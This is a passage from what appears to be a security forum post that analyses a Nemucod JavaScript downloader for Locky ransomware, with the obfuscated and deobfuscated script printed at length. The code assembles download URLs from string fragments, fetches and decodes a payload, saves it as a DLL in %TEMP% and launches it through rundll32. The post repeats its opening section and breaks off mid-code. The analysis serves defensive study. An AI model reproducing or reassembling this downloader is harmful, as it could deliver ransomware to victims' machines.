- May 14, 2016
- 1,597
office_equipment ~40f5dde9
Mail received (testing account for waves)
"Dear DardiM,
Please sign the attached purchase of the office equipment. We will send you back the receipt afterward.
Best regards,
Sergio Camacho
Sales Manager"
I will only talk about the script, it's not an analysis of the ransomware
I reported it to hybrid analysis, it made an analysis, here is the result :
On Virus total :
In fact, the script is very similar to :
1) Main obfuscation :
function d(){
d();
var Ql = new Array("\x66"+"","\x75"+"","\x6e"+"","\x63"+"","\x74"+"","\x69"+"","\x6f"+"","\x20"+"","\x64"+"","\x28"+"","\x29"+"","\x7b"+"","\x0a"+"","\x76"+"","\x61"+"","\x72"+"","\x5f"+"","\x77"+"","\x73"+"","\x3d"+"","\x22"+"","\x57"+"","\x53"+"","\x2b"+"","\x70"+"","\x3b"+"","\x5c"+"","\x25"+"","\x79"+"","\x65"+"","\x6d"+"","\x52"+"","\x33"+"","\x32"+"","\x2e"+"","\x78"+"","\x7a"+"","\x68"+"","\x5b"+"","\x5d"+"","\x43"+"","\x4f"+"","\x62"+"","\x6a"+"","\x6c"+"","\x45"+"","\x59"+"","\x54"+"","\x4d"+"","\x31"+"","\x7d"+"","\x09"+"","\x51"+"","\x44"+"","\x49"+"","\x0d"+"","\x42"+"","\x48"+"","\x30"+"","\x46"+"","\x56"+"","\x67"+"","\x37"+"","\x4c"+"","\x50"+"","\x4a"+"","\x71"+"","\x4e"+"","\x38"+"","\x41"+"","\x5a"+"","\x47"+"","\x55"+"","\x35"+"","\x34"+"","\x36"+"","\x4b"+"","\x58"+"","\x39"+"","\x6b"+"","\x2c"+"","\x2f"+"","\x3a"+"","\x2d"+"","\x3c"+"","\x2a"+"","\x7c"+"","\x3e"+"","\x21"+"","\x5e"+"","\x26");
var Ci8 = [0/1,1/1,2/1,3/1,4/1,5/1,6/1,2/1,7/1,8/1,9/1,10/1,11/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,17/1,8/1,18/1,7/1,19/1,7/1,20/1,21/1,22/1,20/1,23/1,20/1,3/1,15/1,20/1,23/1,20/1,5/1,24/1,4/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,3/1,7/1,19/1,7/1,20/1,26/1,27/1,22/1,20/1,23/1,20/1,28/1,18/1,4/1,29/1,30/1,31/1,6/1,6/1,4/1,26/1,27/1,26/1,26/1,18/1,28/1,18/1,4/1,29/1,30/1,32/1,33/1,26/1,26/1,3/1,30/1,8/1,34/1,20/1,23/1,20/1,29/1,35/1,20/1,23/1,20/1,29/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,36/1,8/1,18/1,7/1,19/1,7/1,4/1,37/1,5/1,18/1,38/1,16/1,17/1,8/1,18/1,39/1,38/1,20/1,40/1,15/1,29/1,14/1,4/1,29/1,41/1,42/1,43/1,29/1,3/1,4/1,20/1,39/1,9/1,16/1,17/1,8/1,18/1,23/1,20/1,34/1,22/1,37/1,29/1,44/1,44/1,20/1,10/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,18/1,29/1,7/1,19/1,7/1,16/1,36/1,8/1,18/1,38/1,20/1,45/1,
...
...
/1,42/1,7/1,23/1,7/1,47/1,31/1,0/1,39/1,9/1,10/1,25/1,55/1,12/1,50/1,25];
var Hp = '';
for (var SSg=0; SSg < Ci8.length; SSg++)
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}
eval(Hp);
2) First deobfuscation :
Var QI : new Array, decoding the \xvalues => unescape unicode:
=>
var Ci8 : all /number part can be removed : number divided by 1
Hp :
Example :
A funny part :
To remove first obfuscation :
3) After first deobfuscation :
Long part, but only need, after, some var concatenation / replacement
var TBh = "cl" + "";
var Hu = "ile" + "";
var Br0 = "oF" + "";
var Vg7 = "SaveT" + "";
var DLg = "Text" + "";
var Py = "write" + "";
var JCq = "n" + "";
var PNp = "ope" + "";
var PQe8 = "rset" + "";
var By8 = "Cha" + "";
var NTs8 = "type" + "";
var EDi = "am" + "";
var HVj3 = "re" + "";
var AHp = "St" + "";
var Md0 = "DB." + "";
var Qg = "O" + "";
var Qh = "D" + "";
var VYl = "A" + "";
var Wg3 = "ct" + "";
var ZVf1 = "eObje" + "";
var Ll = "Creat" + "";
var GPy = "join" + "";
var VUe5 = "e" + "";
var St2 = "arCod" + "";
var NEh0 = "Ch" + "";
var GPe8 = "from" + "";
var Wp = "th" + "";
var Re5 = "leng" + "";
var PIj = "sh" + "";
var Re = "pu" + "";
var Yd7 = "t" + "";
var Oz8 = "deA" + "";
var Jy = "arCo" + "";
var Ha = "ch" + "";
var CJj4 = "gth" + "";
var BWt3 = "len" + "";
var JHm = "e" + "";
var Ru = "clos" + "";
var JMd2 = "xt" + "";
var TUo = "adTe" + "";
var Vi6 = "Re" + "";
var Dx5 = "le" + "";
var Hs = "romFi" + "";
var Cv7 = "adF" + "";
var Dy6 = "Lo" + "";
var UOv = "open" + "";
var Kp = "t" + "";
var XQg1 = "se" + "";
var Lf = "Char" + "";
var APo0 = "e" + "";
var UEs = "typ" + "";
var Uo1 = "am" + "";
var IId = "tre" + "";
var Zp5 = "DB.S" + "";
var JVp2 = "O" + "";
var Dx3 = "D" + "";
var MHl3 = "A" + "";
var PFd9 = "ject" + "";
var NKk = "eOb" + "";
var QSt = "eat" + "";
var ITb = "Cr" + "";
var VIz = "th" + "";
var VOy4 = "leng" + "";
var XVu = "h" + "";
var MJt = "gt" + "";
var Kk7 = "len" + "";
var Xu7 = "ice" + "";
var JGk = "spl" + "";
var XUy3 = "h" + "";
var DOz = "lengt" + "";
var Fg5 = "gth" + "";
var NIw = "len" + "";
var QOe = "th" + "";
var Xq9 = "leng" + "";
var NMu = "th" + "";
var ZXd6 = "leng" + "";
var Sp3 = "h" + "";
var Aq7 = "gt" + "";
var Rr3 = "len" + "";
var Pz4 = "eep" + "";
var Ep = "Sl" + "";
var OCv5 = "3" + "";
var Jh = "y 32" + "";
var Uj = "ert" + "";
var Cp = ",qw" + "";
var Jw = " " + "";
var Ao = "Run" + "";
var Yo2 = "th" + "";
var Gs9 = "leng" + "";
var Uy = "h" + "";
var Il = "lengt" + "";
var TRf = "e" + "";
var Ab = "clos" + "";
var Gh5 = "File" + "";
var Cz = "eTo" + "";
var KIy6 = "Sav" + "";
var LMj = "n" + "";
var WXl8 = "sitio" + "";
var Yq = "po" + "";
var Wz = "y" + "";
var Td7 = "Bod" + "";
var Si = "onse" + "";
var NVt = "Resp" + "";
var PYg = "write" + "";
var WKs3 = "type" + "";
var CLc0 = "en" + "";
var Ya0 = "op" + "";
var Sq1 = "m" + "";
var Da7 = "trea" + "";
var YSd7 = "DB.S" + "";
var NIo1 = "O" + "";
var Gv7 = "D" + "";
var Ma7 = "A" + "";
var Pv3 = "ct" + "";
var Of2 = "eObje" + "";
var Md = "Creat" + "";
var Co = "p" + "";
var BBw = "ee" + "";
var Qw = "Sl" + "";
var ZKp = "send" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
var Oc6 = "GET" + "";
var Wb = "open" + "";
var XHm = "gth" + "";
var EYq = "len" + "";
var He = "Quit" + "";
var Go7 = "ript" + "";
var Dx = "WSc" + "";
var Bb5 = "ts" + "";
var Zg = "xis" + "";
var VQd = "FileE" + "";
var Ka9 = ".txt" + "";
var FXl8 = "s" + "";
var Vn = "ist" + "";
var Va = "Ex" + "";
var Js = "File" + "";
var VGj1 = "t" + "";
var Yy5 = "jec" + "";
var GIy0 = "emOb" + "";
var Hk7 = "st" + "";
var AHq = "leSy" + "";
var Lx2 = ".Fi" + "";
var Ny6 = "ing" + "";
var ZHe = "pt" + "";
var Fj0 = "Scri" + "";
var Cg7 = "ct" + "";
var Ae = "je" + "";
var ZSf8 = "teOb" + "";
var Op0 = "Crea" + "";
var Tl5 = "h" + "";
var HXh4 = "lengt" + "";
var Kk2 = ".1" + "";
var GXj = "est.5" + "";
var Ey7 = "equ" + "";
var CMz6 = "HttpR" + "";
var PWd = "in" + "";
var Ww0 = "tp.W" + "";
var Bx5 = "WinHt" + "";
var Cl1 = "TTP" + "";
var QZf7 = "XMLH" + "";
var KKr2 = "ML2." + "";
var NAp9 = "MSX" + "";
var ABx = "/" + "";
var DQo = "9+" + "";
var BFi = "45678" + "";
var HNn0 = "0123" + "";
var Yu0 = "wxyz" + "";
var FHs = "stuv" + "";
var Gf = "pqr" + "";
var Fi = "no" + "";
var OQa = "klm" + "";
var Ps = "fghij" + "";
var UWj = "bcde" + "";
var AKs8 = "WXYZa" + "";
var YHq9 = "RSTUV" + "";
var IVg3 = "OPQ" + "";
var EDd = "KLMN" + "";
var UXu0 = "GHIJ" + "";
var Dv5 = "CDEF" + "";
var Gd1 = "AB" + "";
var Mi0 = "%SystemRoot%\\\\system32\\\\rundll32.exe" + "";
var NLq = "%SystemRoot%\\\\SysWOW64\\\\rundll32.exe" + "";
var XGx = "amd64" + "";
var HSu1 = "TURE" + "";
var DEa = "ITEC" + "";
var JBs8 = "CH" + "";
var Ht0 = "_AR" + "";
var HYu2 = "OR" + "";
var Ex1 = "SS" + "";
var SIq = "PROCE" + "";
var ZPt = "m" + "";
var Bp2 = "te" + "";
var Ds = "Sys" + "";
var GIf = "ll" + "";
var Fb = ".d" + "";
var Es0 = "Ggw" + "";
var ZLu = "gsGc" + "";
var IZr = "ooSns" + "";
var Fq = "P%/" + "";
var Nj = "%TEM" + "";
var KTx = "l" + "";
var Pi2 = "Shel" + "";
var BZr = "ript." + "";
var GBg = "WSc" + "";
var GNu0 = "ect" + "";
var Jz = "teObj" + "";
var Cd = "Crea" + "";
var BCt = "2ictp" + "";
var Vx = "g/" + "";
var Gj = ".wan" + "";
var Ai0 = "y7" + "";
var ZVf0 = "ad" + "";
var XIa = "l" + "";
var Tp5 = "rano" + "";
var Qq = "sop" + "";
var LOi = "//" + "";
var TTu = "http:" + "";
var NAj = "pe" + "";
var Tp7 = "fhs" + "";
var GPw = "sl" + "";
var BUu7 = "t/" + "";
var Of3 = "ne" + "";
var Nc = "o." + "";
var Tf9 = "i" + "";
var Ea4 = "br" + "";
var ZDn = "li" + "";
var YDg7 = "ui" + "";
var Os = "eq" + "";
var Oz0 = "ado" + "";
var Ag = "ci" + "";
var Ei3 = "ssen" + "";
var Tn = "e" + "";
var QXr = "//" + "";
var XBm = "tp:" + "";
var Ah = "ht" + "";
var IYq0 = "1s5" + "";
var Hl = "ut" + "";
var Af1 = "eu/" + "";
var So = "at." + "";
var Sq6 = "im" + "";
var AYc8 = "e" + "";
var YOv7 = ".h" + "";
var LLy5 = "e" + "";
var Br2 = "rag" + "";
var Cn = "-of-" + "";
var MQh7 = "lm" + "";
var SJa = "ea" + "";
var Ai2 = "p://r" + "";
var Vu0 = "htt" + "";
var JPy = "yg2" + "";
var Ke = "40" + "";
var Wk = "/g" + "";
var Vq = "om" + "";
var Za2 = ".c" + "";
var Kb3 = "e" + "";
var LTh = "ttl" + "";
var MEw1 = "o" + "";
var YXv5 = "xb" + "";
var Ch = "ati" + "";
var DSx = "qu" + "";
var QSu = "://a" + "";
var Dk7 = "p" + "";
var Tj4 = "htt" + "";
var EBb = "cb" + "";
var ULs4 = "v07t7" + "";
var OHi6 = ".68/" + "";
var Hk = "29" + "";
var Ka6 = ".1" + "";
var KFg2 = "26" + "";
var Jj = "2." + "";
var Yq8 = "://21" + "";
var CHu1 = "tp" + "";
var Yc = "ht" + "";
var Ai = "437" + "";
var SQk2 = "ngth" + "";
var TAh2 = "le" + "";
var QGx4 = "m" + "";
var WMm = "mmmm" + "";
var Ji = "mmmmm" + "";
var IOf = "mmm" + "";
var WMf = "mm" + "";
var KKc5 = "mmmm" + "";
var Wd8 = "mmmmm" + "";
var DZa = "mmmm" + "";
var Ap8 = "fd" + "";
var Yu = "sdfas" + "";
var FEo3 = "asfa" + "";
var HAj = "th" + "";
var Zc = "leng" + "";
var HJs = "m" + "";
var YRz = "mm" + "";
var Vo3 = "mmmm" + "";
var HEk4 = "mmmm" + "";
var Pm2 = "mmmmm" + "";
var OXa = "mmmm" + "";
var PAj0 = "mm" + "";
var Sq = "mm" + "";
var Wh8 = "mmm" + "";
var AGf5 = "mmm" + "";
var ZIv = "mmmmm" + "";
var Ht4 = "mmmmm" + "";
var Pe = "mmmm" + "";
var FLt = "mmmmm" + "";
var JFt3 = "mmmmm" + "";
var NRs4 = "mm" + "";
var Fp = "h" + "";
var ETi8 = "lengt" + "";
var Pp9 = "mmm" + "";
var FOt = "mmm" + "";
var RCp2 = "mmmm" + "";
var Un = "mmmmm" + "";
var LKr = "mmmmm" + "";
var JFa2 = "mmmmm" + "";
var Bl8 = "mm" + "";
var Dd2 = "mmmmm" + "";
var NPu2 = "mmmm" + "";
var Is1 = "mm" + "";
var NNc0 = "132" + "";
var Kx0 = "1123" + "";
var Hw = (Kx0 + NNc0, Is1 + NPu2 + Dd2 + Bl8 + JFa2 + LKr + Un + RCp2 + FOt + Pp9);
var Uv = Hw[ETi8 + Fp];
var WBe = (NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz + HJs);
var IVi2 = 753887;
var Uw = WBe[ETi8 + Fp];
var MOk3 = (FEo3 + Yu + Ap8, DZa + Wd8 + KKc5 + WMf + IOf + Ji + WMm + QGx4);
var Ma6 = MOk3[ETi8 + Fp];
var Yz = 2871 - 2870;
var AJf = 2;
var IDz0 = 2;
var Hn = "437";
var IGv7 = [Yc + CHu1 + Yq8 + Jj + KFg2 + Ka6 + Hk + OHi6 + ULs4 + EBb, Tj4 + Dk7 + QSu + DSx + Ch + YXv5 + MEw1 + LTh + Kb3 + Za2 + Vq + Wk + Ke + JPy, Vu0 + Ai2 + SJa + MQh7 + Cn + Br2 + LLy5 + YOv7 + AYc8 + Sq6 + So + Af1 + Hl + IYq0, Ah + XBm + QXr + Tn + Ei3 + Ag + Oz0 + Os + YDg7 + ZDn + Ea4 + Tf9 + Nc + Of3 + BUu7 + GPw + Tp7 + NAj, Ah + XBm + LOi + Qq + Tp5 + XIa + ZVf0 + Ai0 + Gj + Vx + BCt];
var Xl3 = WScript[Cd + Jz + GNu0](GBg + BZr + Pi2 + KTx);
var XWe = Xl3.ExpandEnvironmentStrings(Nj + Fq);
var NQf6 = XWe + IZr + ZLu + Es0;
var Nt5 = NQf6 + Fb + GIf;
var Vu = Xl3.Environment(Ds + Bp2 + ZPt);
if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}
function uheprng(Ww) {
return (function() {
var seed = Ww;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
function rawprng() {
if (++p >= o) p = 1 * 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;
}());
};
function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if (data) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}
var SPz0 = [NAp9 + KKr2 + QZf7 + Cl1, Bx5 + Ww0 + PWd + CMz6 + Ey7 + GXj + Kk2];
for (var Lp9 = 0; Lp9 < SPz0[ETi8 + Fp]; Lp9++) {
try {
var MBi0 = WScript[Cd + Jz + GNu0](SPz0[Lp9]);
break;
} catch (e) {
continue;
}
};
var OPr3 = "";
var fso = new ActiveXObject(Fj0 + ZHe + Ny6 + Lx2 + AHq + Hk7 + GIy0 + Yy5 + VGj1);
var MTm6 = uheprng(Math.random().toString());
var ENa6 = 1;
do {
if (fso[Js + Va + Vn + FXl8](Nt5)) {
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
OPr3 = DAb4 + Ka9;
if (fso[Js + Va + Vn + FXl8](OPr3)) {
this[Dx + Go7][He](824 - 824);
}
}
var HFw3 = MTm6(IGv7[ETi8 + Fp]);
try {
if (1 == ENa6) {
MBi0[Wb](Oc6, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
MBi0[ZKp]();
}
if (MBi0.readystate < 4) {
WScript[Qw + BBw + Co](100);
continue;
}
var Nf = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
Nf[Wb]();
Nf[WKs3] = Yz;
Nf[PYg](MBi0[NVt + Si + Td7 + Wz]);
Nf[Yq + WXl8 + LMj] = 0;
Nf[KIy6 + Cz + Gh5](NQf6, IDz0);
Nf[Ab + TRf]();
var CJf2 = OMb(NQf6);
CJf2 = HIi(CJf2);
if (CJf2[ETi8 + Fp] < 100 * 1024 || CJf2[ETi8 + Fp] > 230 * 1024 || !XHw6(CJf2)) {
ENa6 = 1;
continue;
}
try {
IGi2(Nt5, CJf2);
} catch (e) {
break;
};
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
Xl3[Ao](UFn4 + Jw + DAb4 + Cp + Uj + Jh + OCv5);
WScript.Sleep(3000);
} catch (e) {
WScript[Qw + BBw + Co](1000);
continue;
};
} while (ENa6);
WScript.Quit(0);
function HIi(JEc3) {
var TIk;
var ELs = uheprng(REMOVED_TO_PROTECT_YOU);
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
JEc3[Lp9] ^= ELs(256);
}
var Zm6 = JEc3[JEc3[ETi8 + Fp] - 4] | JEc3[JEc3[ETi8 + Fp] - 3] << 8 | JEc3[JEc3[ETi8 + Fp] - 2] << 16 | JEc3[JEc3[ETi8 + Fp] - 1] << 24;
JEc3[JGk + Xu7](CJf2[ETi8 + Fp] - 4, 4);
TIk = Uv;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
TIk = (TIk + JEc3[Lp9]) % 0x100000000;
};
if (TIk != Zm6) {
return [];
};
return JEc3;
};
function XHw6(JEc3) {
if (JEc3[0] == 0x4D && JEc3[1] == 0x5a) {
return false;
}
};
function OMb(Nq) {
QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Dy6 + Cv7 + Hs + Dx5](Nq);
var Fm = QAl8[Vi6 + TUo + JMd2];
QAl8[Ab + TRf]();
return St(Fm);
};
function St(IBx3) {
Vi5[199] = 50 * 2 + 28;
Vi5[252] = 129;
Vi5[233] = 130;
Vi5[226] = 9737 - 9606;
Vi5[228] = 132;
Vi5[224] = 133;
Vi5[229] = 134;
Vi5[231] = 135;
Vi5[33 * 7 + 3] = 136;
Vi5[6873 - 6638] = 9263 - 9126;
Vi5[232] = -1483 + 1621;
Vi5[239] = 4882 - 4743;
Vi5[238] = 7993 - 7853;
Vi5[236] = 141;
Vi5[196] = 142;
Vi5[197] = -261 + 404;
Vi5[201] = 144;
Vi5[230] = 145;
Vi5[198] = 6355 - 6209;
Vi5[-6198 + 6442] = 147;
Vi5[-4163 + 4409] = 148;
Vi5[242] = 149;
Vi5[251] = 150;
Vi5[249] = 151;
Vi5[255] = 152;
Vi5[7046 - 6832] = 153;
Vi5[5708 - 5488] = 154;
Vi5[162] = 155;
Vi5[163] = 156;
Vi5[165] = 32 * 4 + 29;
Vi5[8359] = 158;
Vi5[402] = 159;
Vi5[225] = 160;
Vi5[6218 - 5981] = 161;
Vi5[243] = -7644 + 7806;
Vi5[250] = 163;
Vi5[5038 - 4797] = 164;
Vi5[209] = 165;
Vi5[170] = 166;
Vi5[186] = 167;
Vi5[191] = 168;
Vi5[8976] = 1933 - 1764;
Vi5[172] = 170;
Vi5[189] = -1595 + 1766;
Vi5[188] = 58 * 2 + 56;
Vi5[9861 - 9700] = 173;
Vi5[171] = 174;
Vi5[9639 - 9452] = 175;
Vi5[1057 * 9 + 104] = 37 * 4 + 28;
Vi5[9618] = -2836 + 3013;
Vi5[9619] = 178;
Vi5[9474] = 179;
Vi5[9508] = 180;
Vi5[9569] = 181;
Vi5[17395 - 7825] = 182;
Vi5[9558] = 183;
Vi5[9557] = 3196 - 3012;
Vi5[1279 + 8292] = 185;
Vi5[9553] = 186;
Vi5[9559] = 71 * 2 + 45;
Vi5[9565] = 188;
Vi5[3243 * 2 + 3078] = 189;
Vi5[9563] = 190;
Vi5[9488] = 191;
Vi5[9492] = 192;
Vi5[9524] = 193;
Vi5[9516] = 194;
Vi5[9500] = 195;
Vi5[9472] = 196;
Vi5[17570 - 8038] = 5 * 39 + 2;
Vi5[9566] = 198;
Vi5[9567] = 199;
Vi5[9562] = 200;
Vi5[9556] = 201;
Vi5[9577] = 202;
Vi5[9574] = 203;
Vi5[9568] = 204;
Vi5[9552] = 205;
Vi5[9580] = 206;
Vi5[9575] = 207;
Vi5[9576] = 208;
Vi5[2030 * 4 + 1452] = -2543 + 2752;
Vi5[9573] = 210;
Vi5[9561] = 211;
Vi5[9560] = 212;
Vi5[9554] = -7618 + 7831;
Vi5[9555] = 214;
Vi5[9579] = 215;
Vi5[9578] = 216;
Vi5[9496] = -2183 + 2400;
Vi5[9484] = 218;
Vi5[7422 + 2186] = 219;
Vi5[9604] = 220;
Vi5[2068 * 4 + 1340] = 10158 - 9937;
Vi5[9616] = 222;
Vi5[9600] = 223;
Vi5[945] = 224;
Vi5[69 * 3 + 16] = 225;
Vi5[5015 - 4100] = 226;
Vi5[960] = 227;
Vi5[-6443 + 7374] = 228;
Vi5[963] = 229;
Vi5[5321 - 5140] = 230;
Vi5[964] = 908 - 677;
Vi5[-7390 + 8324] = 232;
Vi5[920] = 233;
Vi5[5628 - 4691] = 234;
Vi5[7495 - 6547] = 104 * 2 + 27;
Vi5[9421 - 687] = 78 * 3 + 2;
Vi5[966] = 237;
Vi5[949] = 10003 - 9765;
Vi5[8745] = 239;
Vi5[4107 + 4694] = 240;
Vi5[-8510 + 8687] = 5178 - 4937;
Vi5[629 * 13 + 628] = 242;
Vi5[8804] = 243;
Vi5[8992] = 6450 - 6206;
Vi5[8993] = -7303 + 7548;
Vi5[247] = 246;
Vi5[8776] = 247;
Vi5[176] = 248;
Vi5[8729] = 249;
Vi5[183] = 250;
Vi5[8730] = 251;
Vi5[8319] = 252;
Vi5[178] = 253;
Vi5[9632] = 254;
Vi5[160] = 255;
var El = IBx3[Ha + Jy + Oz8 + Yd7](Lp9);
if (El < 128) {
var Lj4 = El;
} else {
var Lj4 = Vi5[El];
}
CJf2[Re + PIj](Lj4);
};
return CJf2;
};
function Kx1(JEc3) {
Io[128] = 15 * 13 + 4;
Io[129] = 252;
Io[-2277 + 2407] = 233;
Io[131] = 226;
Io[-1834 + 1966] = 228;
Io[133] = 224;
Io[1769 - 1635] = 229;
Io[135] = 231;
Io[136] = 234;
Io[137] = 78 * 3 + 1;
Io[138] = 232;
Io[139] = 239;
Io[140] = 238;
Io[141] = 236;
Io[142] = 196;
Io[143] = 197;
Io[144] = 201;
Io[145] = 230;
Io[146] = 198;
Io[46 * 3 + 9] = 244;
Io[148] = 246;
Io[149] = 242;
Io[117 + 33] = 4170 - 3919;
Io[-1899 + 2050] = 249;
Io[152] = 255;
Io[153] = 93 * 2 + 28;
Io[-5752 + 5906] = 10 * 22;
Io[61 * 2 + 33] = 5897 - 5735;
Io[156] = 1376 - 1213;
Io[157] = 165;
Io[158] = 8359;
Io[1784 - 1625] = 65 * 6 + 12;
Io[160] = 225;
Io[161] = 84 * 2 + 69;
Io[162] = 243;
Io[24 * 6 + 19] = 250;
Io[164] = 5946 - 5705;
Io[165] = 13 * 16 + 1;
Io[166] = 170;
Io[167] = 186;
Io[168] = 191;
Io[169] = 8976;
Io[170] = 172;
Io[171] = 189;
Io[172] = 188;
Io[173] = 161;
Io[174] = 171;
Io[175] = 51 * 3 + 34;
Io[8426 - 8250] = 9617;
Io[177] = 9618;
Io[178] = 11785 - 2166;
Io[179] = 3796 * 2 + 1882;
Io[-6284 + 6464] = 13737 - 4229;
Io[181] = 9569;
Io[-8301 + 8483] = 9570;
Io[183] = 6199 + 3359;
Io[184] = 9557;
Io[185] = 9571;
Io[186] = 9553;
Io[187] = 9559;
Io[18 * 10 + 8] = 9565;
Io[43 * 4 + 17] = 9564;
Io[21 * 9 + 1] = 2506 * 3 + 2045;
Io[-4034 + 4225] = 15634 - 6146;
Io[192] = 2698 * 3 + 1398;
Io[-5681 + 5874] = 9524;
Io[194] = 9516;
Io[2693 - 2498] = 9500;
Io[196] = 9472;
Io[15 * 13 + 2] = 9532;
Io[198] = 9566;
Io[199] = 9567;
Io[95 * 2 + 10] = 9562;
Io[201] = 9556;
Io[202] = 9577;
Io[1126 - 923] = 9574;
Io[69 * 2 + 66] = 9568;
Io[205] = 508 * 18 + 408;
Io[206] = 9580;
Io[-6813 + 7020] = 9575;
Io[10080 - 9872] = 9576;
Io[209] = 9572;
Io[210] = 2671 + 6902;
Io[211] = 8842 + 719;
Io[212] = 9487 + 73;
Io[5300 - 5087] = 3300 + 6254;
Io[214] = 9555;
Io[215] = 9579;
Io[216] = 9578;
Io[217] = 9496;
Io[218] = 9484;
Io[-1894 + 2113] = 9608;
Io[220] = 9604;
Io[221] = 9612;
Io[222] = 9616;
Io[6075 - 5852] = 9600;
Io[224] = 945;
Io[31 * 7 + 8] = 223;
Io[78 * 2 + 70] = 915;
Io[94 * 2 + 39] = 960;
Io[228] = 931;
Io[229] = 963;
Io[230] = -7149 + 7330;
Io[231] = 964;
Io[232] = 934;
Io[3 * 77 + 2] = 300 * 3 + 20;
Io[234] = 937;
Io[66 * 3 + 37] = 7499 - 6551;
Io[103 * 2 + 30] = 8734;
Io[2060 - 1823] = 966;
Io[238] = 949;
Io[239] = 8745;
Io[240] = 8801;
Io[9305 - 9064] = -8709 + 8886;
Io[242] = 8805;
Io[5598 - 5355] = 15170 - 6366;
Io[-950 + 1194] = 6040 + 2952;
Io[245] = 8993;
Io[7624 - 7378] = 247;
Io[247] = 8776;
Io[-8782 + 9030] = 6192 - 6016;
Io[249] = 8729;
Io[250] = 183;
Io[251] = 4944 + 3786;
Io[252] = 8319;
Io[-3209 + 3462] = 178;
Io[94 * 2 + 66] = 9632;
Io[255] = 160;
var GLq = new Array();
var Gr = "";
var Lj4;
var El;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
Lj4 = JEc3[Lp9];
if (Lj4 < (9915 - 9787)) {
El = Lj4;
} else {
El = Io[Lj4];
}
GLq.push(String[GPe8 + NEh0 + St2 + VUe5](El));
}
Gr = GLq[GPy]("");
return Gr;
};
function IGi2(Nq, JEc3) {
QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Py + DLg](Kx1(JEc3));
QAl8[KIy6 + Cz + Gh5](Nq, 2);
QAl8[Ab + TRf]();
};
(Modified to avoid copy-paste => run => infected !
)
You can recognize some parts :
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040
Same general method / functions
4) Differences :
- New Locky ransomware version delivered as DLL
See @Solarquest thread
Virus Alert - New Locky ransomware version delivered as DLL
- uses the ShortPath Property
5) URLs :
6) The payload
New locky version.
run => rundll32.exe %TEMP%\OOSNSG~1.DLL,qwerty 323
I can't re explain all the parts done to deobuscate the payload : so I put here the posts, for people that didn't read them (complete explanations, deobfuscated samples, etc)
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528339
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-532040
It looks like the below spoiler, with some other var names
(in red the important modifications, in blue bold : the main loop)
https://malwaretips.com/threads/war...downloader-nemucod-july-28.61796/#post-528138
and all posts below, in the above link
Mail received (testing account for waves)
"Dear DardiM,
Please sign the attached purchase of the office equipment. We will send you back the receipt afterward.
Best regards,
Sergio Camacho
Sales Manager"
I will only talk about the script, it's not an analysis of the ransomware
I reported it to hybrid analysis, it made an analysis, here is the result :
https://www.hybrid-analysis.com/sam...391b5b044d5cb81c88a1feeb057?environmentId=100
It has seen nothing, no infection : normal I forgot to delete my comment parts and rewrite the eval function
It has seen nothing, no infection : normal I forgot to delete my comment parts and rewrite the eval function
The Penguin is exhausted ...
Right file submitted - right analysis done this time - Threat Score: 100/100 :
https://www.hybrid-analysis.com/sam...7a873e5597a4dc163dd23e071c1?environmentId=100
https://www.hybrid-analysis.com/sam...7a873e5597a4dc163dd23e071c1?environmentId=100
On Virus total :
14 / 55 (last edited time)
JS/TrojanDownloader.Nemucod.ASX
https://www.virustotal.com/en/file/...1be9f8a77a873e5597a4dc163dd23e071c1/analysis/
JS/TrojanDownloader.Nemucod.ASX
https://www.virustotal.com/en/file/...1be9f8a77a873e5597a4dc163dd23e071c1/analysis/
In fact, the script is very similar to :
With a big different first obfuscation method, and after, some "small" modifications.
1) Main obfuscation :
function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
